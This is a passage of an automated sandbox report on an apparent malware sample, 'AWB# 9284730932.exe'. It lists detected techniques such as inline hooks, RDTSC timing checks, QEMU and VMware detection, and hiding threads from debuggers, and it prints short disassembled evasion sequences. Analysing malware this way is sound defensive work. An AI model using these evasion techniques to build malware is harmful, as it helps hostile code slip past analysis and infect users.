      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F3CEA5 push eax; ret 14_2_02F3CEF8
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F3C631 push cs; iretd 14_2_02F3C632
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F3CF5C push eax; ret 14_2_02F3CF62
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F3E41C push ebp; ret 14_2_02F3E41D

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeRDTSC instruction interceptor: First address: 00000000022D7DED second address: 00000000022D7DED instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA8D08F8CE8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f test dx, bx 0x00000022 jmp 00007FA8D08F8D12h 0x00000024 test eax, ecx 0x00000026 add edi, edx 0x00000028 test ax, dx 0x0000002b dec dword ptr [ebp+000000F8h] 0x00000031 test ebx, edx 0x00000033 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000003a jne 00007FA8D08F8C8Eh 0x0000003c cmp ch, ch 0x0000003e call 00007FA8D08F8D70h 0x00000043 call 00007FA8D08F8CFAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: AWB# 9284730932.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: AWB# 9284730932.exe, 00000001.00000002.306937352.0000000000741000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeRDTSC instruction interceptor: First address: 00000000022D7DED second address: 00000000022D7DED instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA8D08F8CE8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f test dx, bx 0x00000022 jmp 00007FA8D08F8D12h 0x00000024 test eax, ecx 0x00000026 add edi, edx 0x00000028 test ax, dx 0x0000002b dec dword ptr [ebp+000000F8h] 0x00000031 test ebx, edx 0x00000033 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000003a jne 00007FA8D08F8C8Eh 0x0000003c cmp ch, ch 0x0000003e call 00007FA8D08F8D70h 0x00000043 call 00007FA8D08F8CFAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeRDTSC instruction interceptor: First address: 00000000022D7E3F second address: 00000000022D7E3F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA8D0EDC089h 0x0000001f popad 0x00000020 call 00007FA8D0EDBB1Dh 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeRDTSC instruction interceptor: First address: 0000000000567E3F second address: 0000000000567E3F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA8D08F93E9h 0x0000001f popad 0x00000020 call 00007FA8D08F8E7Dh 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000002F298E4 second address: 0000000002F298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000002F29B5E second address: 0000000002F29B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D86B3 rdtsc 1_2_022D86B3
      Source: C:\Users\user\Desktop\AWB# 9284730932.exe TID: 6652Thread sleep count: 192 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exe TID: 6660Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0016245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,14_2_0016245C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0015B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,14_2_0015B89C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001668BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,14_2_001668BA
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001731DC FindFirstFileW,FindNextFileW,FindClose,14_2_001731DC
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001585EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,14_2_001585EA
      Source: explorer.exe, 0000000D.00000000.352943196.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
      Source: explorer.exe, 0000000D.00000002.507702732.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 0000000D.00000000.352594738.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 0000000D.00000000.333225749.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
      Source: explorer.exe, 0000000D.00000000.352996598.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
      Source: explorer.exe, 0000000D.00000000.347256531.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
      Source: explorer.exe, 0000000D.00000000.352594738.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: AWB# 9284730932.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 0000000D.00000000.352594738.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 0000000D.00000000.352996598.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
      Source: AWB# 9284730932.exe, 00000001.00000002.306937352.0000000000741000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 0000000D.00000000.352594738.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D86B3 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,000000001_2_022D86B3
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D86B3 rdtsc 1_2_022D86B3
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D562F LdrInitializeThunk,1_2_022D562F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_00172258 IsDebuggerPresent,14_2_00172258
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D86B3 mov eax, dword ptr fs:[00000030h]1_2_022D86B3
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D23B6 mov eax, dword ptr fs:[00000030h]1_2_022D23B6
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D41B2 mov eax, dword ptr fs:[00000030h]1_2_022D41B2
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D86DF mov eax, dword ptr fs:[00000030h]1_2_022D86DF
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D874B mov eax, dword ptr fs:[00000030h]1_2_022D874B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D878B mov eax, dword ptr fs:[00000030h]1_2_022D878B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D2B4E mov eax, dword ptr fs:[00000030h]1_2_022D2B4E
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D2EF7 mov eax, dword ptr fs:[00000030h]1_2_022D2EF7
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D2EC7 mov eax, dword ptr fs:[00000030h]1_2_022D2EC7
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D6D7F mov eax, dword ptr fs:[00000030h]1_2_022D6D7F
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_022D7955 mov eax, dword ptr fs:[00000030h]1_2_022D7955
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]11_2_1E3E4A2C
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]11_2_1E3E4A2C
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E434257 mov eax, dword ptr fs:[00000030h]11_2_1E434257
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3AE620 mov eax, dword ptr fs:[00000030h]11_2_1E3AE620
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3C3A1C mov eax, dword ptr fs:[00000030h]11_2_1E3C3A1C
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3DA61C mov eax, dword ptr fs:[00000030h]11_2_1E3DA61C
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3DA61C mov eax, dword ptr fs:[00000030h]11_2_1E3DA61C
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E45B260 mov eax, dword ptr fs:[00000030h]11_2_1E45B260
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E45B260 mov eax, dword ptr fs:[00000030h]11_2_1E45B260
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E478A62 mov eax, dword ptr fs:[00000030h]11_2_1E478A62
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A5210 mov eax, dword ptr fs:[00000030h]11_2_1E3A5210
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A5210 mov ecx, dword ptr fs:[00000030h]11_2_1E3A5210
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A5210 mov eax, dword ptr fs:[00000030h]11_2_1E3A5210
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A5210 mov eax, dword ptr fs:[00000030h]11_2_1E3A5210
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3AAA16 mov eax, dword ptr fs:[00000030h]11_2_1E3AAA16
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3AAA16 mov eax, dword ptr fs:[00000030h]11_2_1E3AAA16
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B8A0A mov eax, dword ptr fs:[00000030h]11_2_1E3B8A0A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3AC600 mov eax, dword ptr fs:[00000030h]11_2_1E3AC600
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3AC600 mov eax, dword ptr fs:[00000030h]11_2_1E3AC600
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3AC600 mov eax, dword ptr fs:[00000030h]11_2_1E3AC600
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D8E00 mov eax, dword ptr fs:[00000030h]11_2_1E3D8E00
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E927A mov eax, dword ptr fs:[00000030h]11_2_1E3E927A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E461608 mov eax, dword ptr fs:[00000030h]11_2_1E461608
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]11_2_1E3CAE73
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]11_2_1E3CAE73
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]11_2_1E3CAE73
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]11_2_1E3CAE73
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]11_2_1E3CAE73
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B766D mov eax, dword ptr fs:[00000030h]11_2_1E3B766D
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A9240 mov eax, dword ptr fs:[00000030h]11_2_1E3A9240
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A9240 mov eax, dword ptr fs:[00000030h]11_2_1E3A9240
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A9240 mov eax, dword ptr fs:[00000030h]11_2_1E3A9240
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A9240 mov eax, dword ptr fs:[00000030h]11_2_1E3A9240
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E45FE3F mov eax, dword ptr fs:[00000030h]11_2_1E45FE3F
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]11_2_1E3B7E41
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]11_2_1E3B7E41
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]11_2_1E3B7E41
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]11_2_1E3B7E41
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]11_2_1E3B7E41
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]11_2_1E3B7E41
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E45FEC0 mov eax, dword ptr fs:[00000030h]11_2_1E45FEC0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h]11_2_1E3BAAB0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h]11_2_1E3BAAB0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3DFAB0 mov eax, dword ptr fs:[00000030h]11_2_1E3DFAB0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E478ED6 mov eax, dword ptr fs:[00000030h]11_2_1E478ED6
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]11_2_1E3A52A5
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]11_2_1E3A52A5
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]11_2_1E3A52A5
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]11_2_1E3A52A5
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]11_2_1E3A52A5
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3DD294 mov eax, dword ptr fs:[00000030h]11_2_1E3DD294
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3DD294 mov eax, dword ptr fs:[00000030h]11_2_1E3DD294
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E43FE87 mov eax, dword ptr fs:[00000030h]11_2_1E43FE87
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B76E2 mov eax, dword ptr fs:[00000030h]11_2_1E3B76E2
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D2AE4 mov eax, dword ptr fs:[00000030h]11_2_1E3D2AE4
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D16E0 mov ecx, dword ptr fs:[00000030h]11_2_1E3D16E0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E470EA5 mov eax, dword ptr fs:[00000030h]11_2_1E470EA5
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E470EA5 mov eax, dword ptr fs:[00000030h]11_2_1E470EA5
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E470EA5 mov eax, dword ptr fs:[00000030h]11_2_1E470EA5
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E4246A7 mov eax, dword ptr fs:[00000030h]11_2_1E4246A7
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D36CC mov eax, dword ptr fs:[00000030h]11_2_1E3D36CC
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D2ACB mov eax, dword ptr fs:[00000030h]11_2_1E3D2ACB
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E8EC7 mov eax, dword ptr fs:[00000030h]11_2_1E3E8EC7
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3DE730 mov eax, dword ptr fs:[00000030h]11_2_1E3DE730
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A4F2E mov eax, dword ptr fs:[00000030h]11_2_1E3A4F2E
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A4F2E mov eax, dword ptr fs:[00000030h]11_2_1E3A4F2E
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E478B58 mov eax, dword ptr fs:[00000030h]11_2_1E478B58
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3CF716 mov eax, dword ptr fs:[00000030h]11_2_1E3CF716
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E478F6A mov eax, dword ptr fs:[00000030h]11_2_1E478F6A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3DA70E mov eax, dword ptr fs:[00000030h]11_2_1E3DA70E
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3DA70E mov eax, dword ptr fs:[00000030h]11_2_1E3DA70E
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D3B7A mov eax, dword ptr fs:[00000030h]11_2_1E3D3B7A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D3B7A mov eax, dword ptr fs:[00000030h]11_2_1E3D3B7A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E47070D mov eax, dword ptr fs:[00000030h]11_2_1E47070D
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E47070D mov eax, dword ptr fs:[00000030h]11_2_1E47070D
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E43FF10 mov eax, dword ptr fs:[00000030h]11_2_1E43FF10
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E43FF10 mov eax, dword ptr fs:[00000030h]11_2_1E43FF10
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3ADB60 mov ecx, dword ptr fs:[00000030h]11_2_1E3ADB60
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3BFF60 mov eax, dword ptr fs:[00000030h]11_2_1E3BFF60
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E46131B mov eax, dword ptr fs:[00000030h]11_2_1E46131B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3AF358 mov eax, dword ptr fs:[00000030h]11_2_1E3AF358
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3ADB40 mov eax, dword ptr fs:[00000030h]11_2_1E3ADB40
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3BEF40 mov eax, dword ptr fs:[00000030h]11_2_1E3BEF40
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E4253CA mov eax, dword ptr fs:[00000030h]11_2_1E4253CA
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E4253CA mov eax, dword ptr fs:[00000030h]11_2_1E4253CA
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]11_2_1E3D4BAD
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]11_2_1E3D4BAD
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]11_2_1E3D4BAD
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D2397 mov eax, dword ptr fs:[00000030h]11_2_1E3D2397
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3DB390 mov eax, dword ptr fs:[00000030h]11_2_1E3DB390
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B8794 mov eax, dword ptr fs:[00000030h]11_2_1E3B8794
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B1B8F mov eax, dword ptr fs:[00000030h]11_2_1E3B1B8F
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B1B8F mov eax, dword ptr fs:[00000030h]11_2_1E3B1B8F
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E45D380 mov ecx, dword ptr fs:[00000030h]11_2_1E45D380
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E37F5 mov eax, dword ptr fs:[00000030h]11_2_1E3E37F5
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E46138A mov eax, dword ptr fs:[00000030h]11_2_1E46138A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3CDBE9 mov eax, dword ptr fs:[00000030h]11_2_1E3CDBE9
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E427794 mov eax, dword ptr fs:[00000030h]11_2_1E427794
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E427794 mov eax, dword ptr fs:[00000030h]11_2_1E427794
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E427794 mov eax, dword ptr fs:[00000030h]11_2_1E427794
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]11_2_1E3D03E2
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]11_2_1E3D03E2
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]11_2_1E3D03E2
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]11_2_1E3D03E2
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]11_2_1E3D03E2
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]11_2_1E3D03E2
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E475BA5 mov eax, dword ptr fs:[00000030h]11_2_1E475BA5
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D002D mov eax, dword ptr fs:[00000030h]11_2_1E3D002D
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D002D mov eax, dword ptr fs:[00000030h]11_2_1E3D002D
